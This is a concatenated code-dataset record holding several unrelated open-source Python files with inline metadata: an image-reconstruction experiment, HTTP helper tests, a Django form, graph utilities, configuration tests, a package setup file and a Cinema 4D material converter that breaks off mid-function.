    and then renders the results via ``plot_reconstructions``.

    :param model: network to fit (e.g. an ``FFN`` instance).
    :param image_GT: ground-truth image, used only for plotting.
    :param save_phrase: suffix embedded in the saved figure filenames.
    :return: the ``outputs`` dict produced by ``fit_image`` (contains at
        least ``"pred_imgs"``).
    """
    # NOTE(review): options are forwarded positionally, so this relies on
    # fit_image's parameter order matching the order below — confirm.
    outputs, _ = fit_image(
        model,
        train_data,
        test_data,
        optimizer_type,
        batch_size,
        start_iter,
        initial_params,
        optimizer,
        opt_state,
        last_layer_rand_init,
        log_every,
        iters,
        learning_rate,
        rand_state,
    )
    plot_reconstructions(outputs, image_GT, save_phrase)
    return outputs
if __name__ == "__main__":
    warnings.filterwarnings("default", category=FutureWarning)
    warnings.filterwarnings("default", category=ImportWarning)
    # save GT image and create test/train data
    image_url = "https://i.imgur.com/OQnG76L.jpeg"
    img = imageio.imread(image_url)
    img = img / 255  # normalize pixel values to [0, 1]
    img = crop_from_right(img, 960)  # square crop before resizing
    img = resize(img, (512, 512), anti_aliasing=True)
    # create a dataset out of that image
    _, img_data = image_to_dataset(img)
    print("Reconstructing with FFN (sigma=10)")
    # Random Fourier features: 256 Gaussian frequencies scaled by sigma=10.
    outputs = train_and_plot_image(
        FFN(
            features=np.array([256, 256, 256, 3]),
            B=10 * jax.random.normal(jax.random.PRNGKey(7), (256, 2)),
        ),
        train_data=img_data,
        test_data=img_data,
        image_GT=img,
        iters=2000,
        save_phrase="rff_256",
    )
    print("Reconstructing with single frequency mapping (f0=1)")
    # single frequency mapping bbf-1
    outputs = train_and_plot_image(
        FFN(features=np.array([256, 256, 256, 3]), B=np.eye(2)),
        train_data=img_data,
        test_data=img_data,
        image_GT=img,
        iters=2000,
        save_phrase="bff_1",
    )
    print("Reconstructing with single frequency mapping (f0=05)")
    # single frequency mapping bff-05
    outputs = train_and_plot_image(
        FFN(features=np.array([256, 256, 256, 3]), B=0.5 * np.eye(2)),
        train_data=img_data,
        test_data=img_data,
        image_GT=img,
        iters=2000,
        save_phrase="bff_05",
    )
| import os
import imageio
import jax
import matplotlib.pyplot as plt
import numpy as np
from skimage.transform import resize
import warnings
from models.models_flax import FFN
from train.standard import fit_image
from utils.graphics import plot_fourier_tranform
from utils.img_processing import crop_from_right, image_to_dataset
def plot_reconstructions(
outputs,
image_GT,
save_phrase="",
):
outdir = os.path.join(os.getcwd(), "figures", "figure_2")
if not os.path.exists(outdir):
os.makedirs(outdir)
# Show final network outputs
plt.figure(figsize=(12, 4))
rec = outputs["pred_imgs"][-1]
plt.imshow(rec)
plt.axis("off")
plt.savefig(outdir + "/rec_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plt.imshow(image_GT)
plt.axis("off")
plt.savefig(outdir + "/gt_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plot_fourier_tranform(rec)
plt.savefig(outdir + "/rec_ft_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plot_fourier_tranform(image_GT)
plt.savefig(outdir + "/gt_ft_" + save_phrase + ".pdf", bbox_inches="tight")
def train_and_plot_image(
model,
train_data,
test_data,
image_GT,
optimizer_type="adam",
batch_size=None,
start_iter=0,
initial_params=None,
optimizer=None,
opt_state=None,
last_layer_rand_init=False,
log_every=25,
iters=2000,
learning_rate=1e-4,
rand_state=0,
save_phrase="",
):
outputs, _ = fit_image(
model,
train_data,
test_data,
optimizer_type,
batch_size,
start_iter,
initial_params,
optimizer,
opt_state,
last_layer_rand_init,
log_every,
iters,
learning_rate,
rand_state,
)
plot_reconstructions(outputs, image_GT, save_phrase)
return outputs
if __name__ == "__main__":
warnings.filterwarnings("default", category=FutureWarning)
warnings.filterwarnings("default", category=ImportWarning)
# save GT image and create test/train data
image_url = "https://i.imgur.com/OQnG76L.jpeg"
img = imageio.imread(image_url)
img = img / 255
img = crop_from_right(img, 960)
img = resize(img, (512, 512), anti_aliasing=True)
# create a dataset out of that image
_, img_data = image_to_dataset(img)
print("Reconstructing with FFN (sigma=10)")
outputs = train_and_plot_image(
FFN(
features=np.array([256, 256, 256, 3]),
B=10 * jax.random.normal(jax.random.PRNGKey(7), (256, 2)),
),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="rff_256",
)
print("Reconstructing with single frequency mapping (f0=1)")
# single frequency mapping bbf-1
outputs = train_and_plot_image(
FFN(features=np.array([256, 256, 256, 3]), B=np.eye(2)),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="bff_1",
)
print("Reconstructing with single frequency mapping (f0=05)")
# single frequency mapping bff-05
outputs = train_and_plot_image(
FFN(features=np.array([256, 256, 256, 3]), B=0.5 * np.eye(2)),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="bff_05",
) | en | 0.743623 | # Show final network outputs # save GT image and create test/train data # create a dataset out of that image # single frequency mapping bbf-1 # single frequency mapping bff-05 | 2.066052 | 2 |
tests/test_request.py | copper/python-pointdns | 1 | 6612420 | <reponame>copper/python-pointdns
from pointdns.helpers import request
import unittest2
from httmock import urlmatch, HTTMock
class RequestTests(unittest2.TestCase):
    """Exercise the pointdns ``request`` helper against a mocked pointhq.com API."""

    def _check_request(self, method, scheme):
        """Issue *method* over *scheme* against a mocked endpoint and verify the reply."""
        @urlmatch(netloc=r'pointhq\.com', scheme=scheme,
                  method=method, path='/')
        def response_content(url, request):
            return {'status_code': 200,
                    'content': b'OK'}
        with HTTMock(response_content):
            r = request(method, '/', ('john', 'secret-key'), scheme=scheme)
            # assertEqual gives clearer failure messages than assertTrue(a == b).
            self.assertEqual(r.status, 200)
            self.assertEqual(r.content, 'OK')

    def test_https_post_request(self):
        self._check_request('post', 'https')

    def test_http_get_request(self):
        self._check_request('get', 'http')

    def test_http_put_request(self):
        self._check_request('put', 'http')

    def test_https_put_request(self):
        self._check_request('put', 'https')
| from pointdns.helpers import request
import unittest2
from httmock import urlmatch, HTTMock
class RequestTests(unittest2.TestCase):
def test_https_post_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='https',
method='post', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('post', '/', ('john', 'secret-key'), scheme='https')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_http_get_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='http',
method='get', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('get', '/', ('john', 'secret-key'), scheme='http')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_http_put_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='http',
method='put', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('put', '/', ('john', 'secret-key'), scheme='http')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_https_put_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='https',
method='put', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('put', '/', ('john', 'secret-key'), scheme='https')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK') | none | 1 | 2.610367 | 3 | |
mysite/calls/forms.py | gurupratap-matharu/django-calls-registration-app | 0 | 6612421 | from django import forms
from .models import Call
class RegisterForm(forms.ModelForm):
    """Model form for registering a Call (user supplies duration and type)."""
    class Meta:
        model = Call
        # Only these fields are editable through this form.
        fields = ['duration', 'type']
| from django import forms
from .models import Call
class RegisterForm(forms.ModelForm):
class Meta:
model = Call
fields = ['duration', 'type']
| none | 1 | 1.851829 | 2 | |
ontology_processing/graph_creation/ontology_processing_utils.py | ClimateMind/climatemind-ontology-processing | 0 | 6612422 | <gh_stars>0
import networkx as nx
from networkx.readwrite import json_graph
import os
from collections import OrderedDict
def custom_bfs(graph, start_node, direction="forward", edge_type="causes_or_promotes"):
    """
    Explores graph and gets the subgraph containing all the nodes that are reached via BFS from start_node

    Parameters
    ----------
    graph - nx.DiGraph to explore
    start_node - root of the BFS search
    direction - forward, reverse, or any. Controls what direction BFS searches in
    edge_type - only explore along edges of this type (can be "any")

    Returns
    -------
    subgraph with nodes explored
    """
    # `order` keeps discovery order (handed to subgraph at the end);
    # `visited` gives O(1) membership tests instead of the original
    # O(n) list scans, turning the traversal from O(n^2) into O(V + E).
    order = [start_node]
    visited = {start_node}
    cur_index = 0

    def expand(element):
        if direction in ("reverse", "any"):
            for start, end, kind in graph.in_edges(element, "type"):
                if start not in visited and (edge_type == "any" or kind == edge_type):
                    visited.add(start)
                    order.append(start)
        if direction in ("forward", "any"):
            for start, end, kind in graph.out_edges(element, "type"):
                if end not in visited and (edge_type == "any" or kind == edge_type):
                    visited.add(end)
                    order.append(end)

    while cur_index < len(order):
        expand(order[cur_index])
        cur_index += 1
    return graph.subgraph(order)
def union_subgraph(subgraphs, *, base_graph):
    """
    Joins multiple subgraphs of the same base graph together. Edges connecting subgraphs are also included
    (whereas nx.union doesn't include edges connecting subgraphs together).

    Parameters
    ----------
    subgraphs - a list of subgraphs to union
    base_graph - forced keyword argument of the graph that these subgraphs are based upon

    Returns
    -------
    a new subgraph of base_graph containing all nodes in subgraphs list
    """
    # Collect every node from every subgraph, then view them in base_graph
    # so connecting edges are preserved.
    all_nodes = set()
    for subg in subgraphs:
        all_nodes.update(subg.nodes())
    return base_graph.subgraph(all_nodes)
def listify(collection, onto):
    """Return str(first label) of each thing in *collection* that is a class of *onto*.

    The original re-evaluated ``onto.classes()`` for every element of
    *collection*; hoisting it out of the loop avoids an O(n*m) rescan
    (and works even if classes() returns a fresh generator each call).
    """
    known_classes = list(onto.classes())
    return [str(thing.label[0]) for thing in collection if thing in known_classes]
def get_source_types():
    """Return the node property names that may hold solution source references."""
    return [
        "dc_source",
        "schema_academicBook",
        "schema_academicSourceNoPaywall",
        "schema_academicSourceWithPaywall",
        "schema_governmentSource",
        "schema_mediaSource",
        "schema_mediaSourceForConservatives",
        "schema_organizationSource",
    ]
def solution_sources(node):
    """Returns a flattened list of custom solution source values from each node key that matches
    custom_source_types string.

    node - NetworkX node
    source_types - list of sources types
    """
    # Gather every source value in source-type order, then drop duplicates
    # while keeping first-seen order.
    props = node["properties"] if "properties" in node else {}
    collected = []
    for key in get_source_types():
        if key in props:
            collected.extend(props[key])
    return list(OrderedDict.fromkeys(collected))
def get_valid_test_ont():
    """Return the set of class labels that belong to the test ontology (personal values)."""
    return {
        "test ontology",
        "personal value",
        "achievement",
        "benevolence",
        "benevolence caring",
        "benevolence dependability",
        "conformity",
        "conformity interpersonal",
        "conformity rules",
        "face",
        "hedonism",
        "humility",
        "power",
        "power dominance",
        "power resources",
        "security",
        "security personal",
        "security societal",
        "self-direction",
        "self-direction autonomy of action",
        "self-direction autonomy of thought",
        "stimulation",
        "tradition",
        "universalism",
        "universalism concern",
        "universalism nature",
        "universalism tolerance",
    }
def get_non_test_ont():
    """Return the set of class labels that disqualify a node from the test ontology."""
    return {
        "value uncategorized (to do)",
        "risk solution",
        "adaptation",
        "geoengineering",
        "indirect adaptation",
        "indirect geoengineering",
        "indirect mitigration",
        "carbon pricing",
        "carbon tax",
        "emissions trading",
        "mitigation",
        "solution to indirect adaptation barrier",
        "solution to indirect mitigation barrier",
        "solution uncategorized (to do)",
    }
def remove_non_test_nodes(T, node, valid_test_ont, not_test_ont):
    """Remove *node* from graph ``T`` unless its direct classes mark it as test-ontology.

    A node survives only if at least one of its "direct classes" is in
    *valid_test_ont* and none encountered up to that point is in
    *not_test_ont* (a disqualifying class short-circuits the scan).
    Nodes absent from ``T`` are ignored.
    """
    # Guard clause replaces the original if/else (whose else branch only
    # assigned a dead local variable).
    if node not in T.nodes:
        return
    is_test_ont = False
    for c in T.nodes[node]["direct classes"]:
        if c in valid_test_ont:
            is_test_ont = True
        if c in not_test_ont:
            is_test_ont = False
            break
    if not is_test_ont:
        T.remove_node(node)
def get_test_ontology(T, valid_test_ont, not_test_ont):
    """Prune graph ``T`` in place, removing edge endpoints that are not test-ontology nodes."""
    # Snapshot the edges first because remove_non_test_nodes mutates T
    # while we iterate.
    for edge in list(T.edges):
        node_a = edge[0]
        node_b = edge[1]
        remove_non_test_nodes(T, node_a, valid_test_ont, not_test_ont)
        remove_non_test_nodes(T, node_b, valid_test_ont, not_test_ont)
def give_alias(property_object):
    """Derive a Python-safe alias from the object's first label and assign it.

    '/' becomes '_or_', spaces and ':' become '_'. The alias is stored on
    ``property_object.python_name`` and also returned.
    """
    # One translate() pass replaces the chained .replace() calls; the
    # replacement strings introduce no characters that are themselves
    # replaced, so the result is identical.
    table = str.maketrans({"/": "_or_", " ": "_", ":": "_"})
    alias = str(property_object.label[0]).translate(table)
    property_object.python_name = alias
    return alias
def _save_graph_helper(G, outfile_path, fname="Climate_Mind_DiGraph", ext=".gpickle"):
    """Write graph ``G`` to ``outfile_path/fname + ext`` using the writer matching *ext*."""
    # Dispatch table: file extension -> networkx writer callable.
    writer = {
        ".gpickle": nx.write_gpickle,
        ".gexf": nx.write_gexf,
        ".gml": nx.write_gml,
        ".graphml": nx.write_graphml,
        #".yaml": nx.write_yaml,
        ".json": lambda g, f: f.write(json_graph.jit_data(g, indent=4)),
    }
    # Text formats need a text-mode handle; the rest are written in binary.
    # NOTE(review): ".yaml" gets text mode here but its writer above is
    # commented out, so ext=".yaml" would raise KeyError — confirm intended.
    mode = "wb"
    if ext in (".json", ".yaml"):
        mode = "w"
    file_path = os.path.join(outfile_path, fname + ext)
    with open(file_path, mode) as outfile:
        writer[ext](G, outfile)
# Thin convenience wrappers over _save_graph_helper, one per format.
def save_graph_to_pickle(G, outfile_path, fname="Climate_Mind_DiGraph"):
    _save_graph_helper(G, outfile_path, fname, ext=".gpickle")
def save_graph_to_gexf(G, outfile_path, fname="Climate_Mind_DiGraph"):
    _save_graph_helper(G, outfile_path, fname, ext=".gexf")
def save_graph_to_gml(G, outfile_path, fname="Climate_Mind_DiGraph"):
    _save_graph_helper(G, outfile_path, fname, ext=".gml")
def save_graph_to_graphml(G, outfile_path, fname="Climate_Mind_DiGraph"):
    _save_graph_helper(G, outfile_path, fname, ext=".graphml")
#def save_graph_to_yaml(G, outfile_path, fname="Climate_Mind_DiGraph"):
# _save_graph_helper(G, outfile_path, fname, ext=".yaml")
def save_graph_to_json(G, outfile_path, fname="Climate_Mind_DiGraph"):
    _save_graph_helper(G, outfile_path, fname, ext=".json")
def save_test_ontology_to_json(G, outfile_path, fname="Climate_Mind_Digraph_Test_Ont"):
    """Save the pruned test-ontology graph as JSON (delegates to save_graph_to_json)."""
    save_graph_to_json(G, outfile_path, fname)
| import networkx as nx
from networkx.readwrite import json_graph
import os
from collections import OrderedDict
def custom_bfs(graph, start_node, direction="forward", edge_type="causes_or_promotes"):
"""
Explores graph and gets the subgraph containing all the nodes that are reached via BFS from start_node
Parameters
----------
graph - nx.DiGraph to explore
start_node - root of the BFS search
direction - forward, reverse, or any. Controls what direction BFS searches in
edge_type - only explore along edges of this type (can be "any")
Returns
-------
subgraph with nodes explored
"""
# Using a list because we want to have the explored elements returned later.
queue = [start_node]
cur_index = 0
def do_bfs(element):
nonlocal cur_index
if direction == "reverse" or direction == "any":
for start, end, type in graph.in_edges(element, "type"):
if start not in queue and (edge_type == "any" or type == edge_type):
queue.append(start)
if direction == "forward" or direction == "any":
for start, end, type in graph.out_edges(element, "type"):
if end not in queue and (edge_type == "any" or type == edge_type):
queue.append(end)
do_bfs(start_node)
while cur_index < len(queue):
do_bfs(queue[cur_index])
cur_index = cur_index + 1
return graph.subgraph(queue)
def union_subgraph(subgraphs, *, base_graph):
"""
Joins multiple subgraphs of the same base graph together. Edges connecting subgraphs are also included
(whereas nx.union doesn't include edges connecting subgraphs together).
Parameters
----------
subgraphs - a list of subgraphs to union
base_graph - forced keyword argument of the graph that these subgraphs are based upon
Returns
-------
a new subgraph of base_graph containing all nodes in subgraphs list
"""
G_node_set = set()
for other_subg in subgraphs:
G_node_set = G_node_set.union(set(other_subg.nodes()))
return base_graph.subgraph(G_node_set)
def listify(collection, onto):
"""just capturing a repeated operation"""
return [str(thing.label[0]) for thing in collection if thing in onto.classes()]
def get_source_types():
return [
"dc_source",
"schema_academicBook",
"schema_academicSourceNoPaywall",
"schema_academicSourceWithPaywall",
"schema_governmentSource",
"schema_mediaSource",
"schema_mediaSourceForConservatives",
"schema_organizationSource",
]
def solution_sources(node):
"""Returns a flattened list of custom solution source values from each node key that matches
custom_source_types string.
node - NetworkX node
source_types - list of sources types
"""
source_types = get_source_types()
# loop over each solution source key and append each returned value to the solution_sources list
solution_source_list = list()
for source_type in source_types:
if "properties" in node and source_type in node["properties"]:
solution_source_list.extend(node["properties"][source_type])
solution_source_list = list(OrderedDict.fromkeys(solution_source_list))
return solution_source_list
def get_valid_test_ont():
return {
"test ontology",
"personal value",
"achievement",
"benevolence",
"benevolence caring",
"benevolence dependability",
"conformity",
"conformity interpersonal",
"conformity rules",
"face",
"hedonism",
"humility",
"power",
"power dominance",
"power resources",
"security",
"security personal",
"security societal",
"self-direction",
"self-direction autonomy of action",
"self-direction autonomy of thought",
"stimulation",
"tradition",
"universalism",
"universalism concern",
"universalism nature",
"universalism tolerance",
}
def get_non_test_ont():
return {
"value uncategorized (to do)",
"risk solution",
"adaptation",
"geoengineering",
"indirect adaptation",
"indirect geoengineering",
"indirect mitigration",
"carbon pricing",
"carbon tax",
"emissions trading",
"mitigation",
"solution to indirect adaptation barrier",
"solution to indirect mitigation barrier",
"solution uncategorized (to do)",
}
def remove_non_test_nodes(T, node, valid_test_ont, not_test_ont):
if node in T.nodes:
is_test_ont = False
for c in T.nodes[node]["direct classes"]:
if c in valid_test_ont:
is_test_ont = True
if c in not_test_ont:
is_test_ont = False
break
if not is_test_ont:
T.remove_node(node)
else:
is_test_ont = False
def get_test_ontology(T, valid_test_ont, not_test_ont):
for edge in list(T.edges):
node_a = edge[0]
node_b = edge[1]
remove_non_test_nodes(T, node_a, valid_test_ont, not_test_ont)
remove_non_test_nodes(T, node_b, valid_test_ont, not_test_ont)
def give_alias(property_object):
label_name = property_object.label[0]
label_name = label_name.replace("/", "_or_")
label_name = label_name.replace(" ", "_")
label_name = label_name.replace(":", "_")
property_object.python_name = label_name
return label_name
def _save_graph_helper(G, outfile_path, fname="Climate_Mind_DiGraph", ext=".gpickle"):
writer = {
".gpickle": nx.write_gpickle,
".gexf": nx.write_gexf,
".gml": nx.write_gml,
".graphml": nx.write_graphml,
#".yaml": nx.write_yaml,
".json": lambda g, f: f.write(json_graph.jit_data(g, indent=4)),
}
mode = "wb"
if ext in (".json", ".yaml"):
mode = "w"
file_path = os.path.join(outfile_path, fname + ext)
with open(file_path, mode) as outfile:
writer[ext](G, outfile)
def save_graph_to_pickle(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gpickle")
def save_graph_to_gexf(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gexf")
def save_graph_to_gml(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gml")
def save_graph_to_graphml(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".graphml")
#def save_graph_to_yaml(G, outfile_path, fname="Climate_Mind_DiGraph"):
# _save_graph_helper(G, outfile_path, fname, ext=".yaml")
def save_graph_to_json(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".json")
def save_test_ontology_to_json(G, outfile_path, fname="Climate_Mind_Digraph_Test_Ont"):
save_graph_to_json(G, outfile_path, fname) | en | 0.835718 | Explores graph and gets the subgraph containing all the nodes that are reached via BFS from start_node Parameters ---------- graph - nx.DiGraph to explore start_node - root of the BFS search direction - forward, reverse, or any. Controls what direction BFS searches in edge_type - only explore along edges of this type (can be "any") Returns ------- subgraph with nodes explored # Using a list because we want to have the explored elements returned later. Joins multiple subgraphs of the same base graph together. Edges connecting subgraphs are also included (whereas nx.union doesn't include edges connecting subgraphs together). Parameters ---------- subgraphs - a list of subgraphs to union base_graph - forced keyword argument of the graph that these subgraphs are based upon Returns ------- a new subgraph of base_graph containing all nodes in subgraphs list just capturing a repeated operation Returns a flattened list of custom solution source values from each node key that matches custom_source_types string. node - NetworkX node source_types - list of sources types # loop over each solution source key and append each returned value to the solution_sources list #".yaml": nx.write_yaml, #def save_graph_to_yaml(G, outfile_path, fname="Climate_Mind_DiGraph"): # _save_graph_helper(G, outfile_path, fname, ext=".yaml") | 3.25276 | 3 |
tests/utils/configuration_test.py | kokosing/git-gifi | 9 | 6612423 | from tests.utils.git_test import AbstractGitReposTest
import mock
from gifi.command import CommandException
from gifi.utils.configuration import Configuration, configuration_command
class ConfigurationTest(AbstractGitReposTest):
    """Tests for gifi Configuration: defaults, persistence, prompting, validation."""
    # NOTE(review): mock.patch targets '__builtin__.input', which exists only
    # on Python 2 (Python 3 renamed the module to 'builtins'); together with
    # unittest2/mock this suggests a Python 2 suite — confirm before porting.
    def test_happy_path(self):
        # Defaults are visible via attribute, mapping access, list() and
        # description(); set() persists into the backing repo config.
        config = self._create_test_config()
        assert config.sample == 'sample_default_value'
        assert config['sample'] == 'sample_default_value'
        assert config.list() == ['sample']
        assert config.description('sample') == 'Sample description'
        config.set('sample', 'new value')
        assert config.sample == 'new value'
        # A freshly built Configuration sees the persisted value.
        newConfig = self._create_test_config()
        assert newConfig.sample == 'new value'
    def _create_test_config(self):
        # Helper: Configuration with a single string key 'sample'.
        config = Configuration(self.local_repo, 'test', {
            'sample': ('sample_default_value', 'Sample description')
        })
        return config
    def test_configure(self):
        # Answering 'true' at the prompt coerces the value to boolean True.
        config = self._bool_config()
        with mock.patch('__builtin__.input', return_value='true'):
            config.configure()
        assert config.bool_property == True
    def test_configure_with_wrong_input(self):
        # A non-boolean answer raises CommandException and keeps the default.
        config = self._bool_config()
        with mock.patch('__builtin__.input', return_value='wrong value'):
            expected_msg = ".*Wrong value.*"
            with self.assertRaisesRegexp(CommandException, expected_msg):
                config.configure()
        assert config.bool_property == False
    def _bool_config(self):
        # Helper: Configuration with a single boolean key 'bool-property'.
        config = Configuration(self.local_repo, 'test', {
            'bool-property': (False, 'Description')
        })
        return config
    def test_configure_with_no_input(self):
        # Pressing enter (empty answer) keeps the default value.
        config = self._create_test_config()
        with mock.patch('__builtin__.input', return_value=''):
            config.configure()
        assert config.sample == 'sample_default_value'
    def test_command(self):
        # configuration_command wraps configure() into a callable command.
        with mock.patch('__builtin__.input', return_value=''):
            configuration_command(self._create_test_config, "description")()
| from tests.utils.git_test import AbstractGitReposTest
import mock
from gifi.command import CommandException
from gifi.utils.configuration import Configuration, configuration_command
class ConfigurationTest(AbstractGitReposTest):
    # Exercises gifi's Configuration wrapper around git-config values.
    # NOTE(review): `mock.patch('__builtin__.input', ...)` targets the
    # Python 2 builtins module; on Python 3 the target would be
    # 'builtins.input' -- confirm the intended interpreter version.

    def test_happy_path(self):
        """Read, list, describe, update and persist a configuration value."""
        config = self._create_test_config()
        assert config.sample == 'sample_default_value'
        assert config['sample'] == 'sample_default_value'
        assert config.list() == ['sample']
        assert config.description('sample') == 'Sample description'
        config.set('sample', 'new value')
        assert config.sample == 'new value'
        # A freshly created Configuration sees the value persisted above.
        newConfig = self._create_test_config()
        assert newConfig.sample == 'new value'

    def _create_test_config(self):
        # Helper: configuration with a single string property and its default.
        config = Configuration(self.local_repo, 'test', {
            'sample': ('sample_default_value', 'Sample description')
        })
        return config

    def test_configure(self):
        """Interactive configure() parses the answer 'true' into a boolean."""
        config = self._bool_config()
        with mock.patch('__builtin__.input', return_value='true'):
            config.configure()
        assert config.bool_property == True

    def test_configure_with_wrong_input(self):
        """A non-boolean answer raises CommandException and keeps the old value."""
        config = self._bool_config()
        with mock.patch('__builtin__.input', return_value='wrong value'):
            expected_msg = ".*Wrong value.*"
            with self.assertRaisesRegexp(CommandException, expected_msg):
                config.configure()
        assert config.bool_property == False

    def _bool_config(self):
        # Helper: configuration with a single boolean property (default False).
        config = Configuration(self.local_repo, 'test', {
            'bool-property': (False, 'Description')
        })
        return config

    def test_configure_with_no_input(self):
        """An empty interactive answer keeps the default value."""
        config = self._create_test_config()
        with mock.patch('__builtin__.input', return_value=''):
            config.configure()
        assert config.sample == 'sample_default_value'

    def test_command(self):
        """configuration_command() wraps a config factory into a callable command."""
        with mock.patch('__builtin__.input', return_value=''):
            configuration_command(self._create_test_config, "description")()
| none | 1 | 2.676061 | 3 | |
setup.py | gasymovdf/sla | 0 | 6612424 | <reponame>gasymovdf/sla
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='sla',
version='1.3.3',
author="<NAME>",
author_email="<EMAIL>",
description="Non-parametric LOSVD analysis for galaxy spectra",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/gasymovdf/sla",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=["pseudoslit==0.0.2",
"numpy==1.21.4",
"scipy==1.7.3",
"matplotlib==3.5.1",
"astropy==5.0",
"lmfit==1.0.3",
"vorbin==3.1.4",
"pseudoslit==0.0.2",
"glob2==0.7",
"PyPDF2==1.26.0",
"tqdm==4.62.3"]
) | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='sla',
version='1.3.3',
author="<NAME>",
author_email="<EMAIL>",
description="Non-parametric LOSVD analysis for galaxy spectra",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/gasymovdf/sla",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=["pseudoslit==0.0.2",
"numpy==1.21.4",
"scipy==1.7.3",
"matplotlib==3.5.1",
"astropy==5.0",
"lmfit==1.0.3",
"vorbin==3.1.4",
"pseudoslit==0.0.2",
"glob2==0.7",
"PyPDF2==1.26.0",
"tqdm==4.62.3"]
) | none | 1 | 1.340731 | 1 | |
exemple/basicc4dconverted.py | gr4ph0s/C4DToA_python_wrapper | 5 | 6612425 | """
08-26-2017
Basic exemple of the arnold python wrapper.
It convert diffuse, first layer of reflectance, normal and alpha into a correct arnold shader.
"""
import c4d
import os
from arnold_wrapper.Arnold import Arnold
def get_reflectance(mat):
    """Return the texture shader of the c4d reflectance channel slot, or None.

    The entire lookup is guarded: the parameter-ID arithmetic previously sat
    outside the try block, so a material type without reflectance constants
    could raise instead of returning None.
    """
    filename = None
    try:
        # Parameter-ID offset of the reflectance layer's data block.
        # NOTE(review): the *4 offset looks like it addresses the 4th layer
        # block, while the original docstring said "first slot" -- confirm.
        base = c4d.REFLECTION_LAYER_LAYER_DATA + c4d.REFLECTION_LAYER_LAYER_SIZE * 4
        filename = mat[base + c4d.REFLECTION_LAYER_COLOR_TEXTURE]
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt
        pass
    return filename
def get_normal(mat):
    """Return the texture shader of the c4d material's normal channel, or None."""
    filename = None
    try:
        filename = mat[c4d.MATERIAL_NORMAL_SHADER]
    except Exception:  # was a bare `except:`; narrowed so Ctrl-C still works
        pass
    return filename
def get_diffuse(mat):
    """Return the texture shader of the c4d material's color channel, or None."""
    filename = None
    try:
        filename = mat[c4d.MATERIAL_COLOR_SHADER]
    except Exception:  # was a bare `except:`; narrowed so Ctrl-C still works
        pass
    return filename
def get_alpha(mat):
    """Return (alpha texture shader, invert flag) of the c4d material.

    Yields (None, False) when the material exposes no alpha channel data.
    """
    filename = None
    inverted = False
    try:
        filename = mat[c4d.MATERIAL_ALPHA_SHADER]
        inverted = mat[c4d.MATERIAL_ALPHA_INVERT]
    except Exception:  # was a bare `except:`; narrowed so Ctrl-C still works
        pass
    return filename, inverted
def past_assignment(doc, source, dest):
    """Re-point every texture tag using the `source` material to `dest`.

    Walks the material's assignment links and rewrites each linked texture
    tag, registering one undo step per tag on `doc`.
    """
    obj_link = source[c4d.ID_MATERIALASSIGNMENTS]
    # `range(0, n)` and the dead `tag = None` pre-initialization removed.
    for i in range(obj_link.GetObjectCount()):
        tag = obj_link.ObjectFromIndex(doc, i)
        if tag:
            doc.AddUndo(c4d.UNDOTYPE_CHANGE, tag)
            tag[c4d.TEXTURETAG_MATERIAL] = dest
def get_filepath(sha):
    """Return the file path stored in a bitmap shader, or None if unavailable."""
    # Bail out unless we were handed a bitmap shader with a filename set.
    if not sha or not sha.CheckType(c4d.Xbitmap):
        return None
    full_path = sha[c4d.BITMAPSHADER_FILENAME]
    return str(full_path) if full_path else None
def convert_c4d_to_arnold(doc, mat):
    """Convert a standard c4d material into an Arnold standard_surface material.

    Copies the diffuse, reflectance, normal and alpha channels into an
    equivalent Arnold shader network, mirrors the material name and object
    assignments, and registers undo steps on `doc`.
    """
    a = Arnold()

    # Gather the source textures; each path is None when the channel is unset.
    diffuse = get_diffuse(mat)
    diffuse_path = get_filepath(diffuse)
    reflectance = get_reflectance(mat)
    reflectance_path = get_filepath(reflectance)
    normal = get_normal(mat)
    normal_path = get_filepath(normal)
    alpha, alpha_invert = get_alpha(mat)
    alpha_path = get_filepath(alpha)

    # Create the replacement Arnold material and mirror name/assignments.
    new_mat = c4d.BaseMaterial(a.ARNOLD_MATERIAL)
    doc.InsertMaterial(new_mat)
    doc.AddUndo(c4d.UNDOTYPE_NEW, new_mat)
    new_mat.SetName(mat.GetName())
    past_assignment(doc, mat, new_mat)

    a.set_mat(new_mat)
    standard_node = a.create_shader(a.ARNOLD_SHADER_GV, "standard_surface", 700, 200)
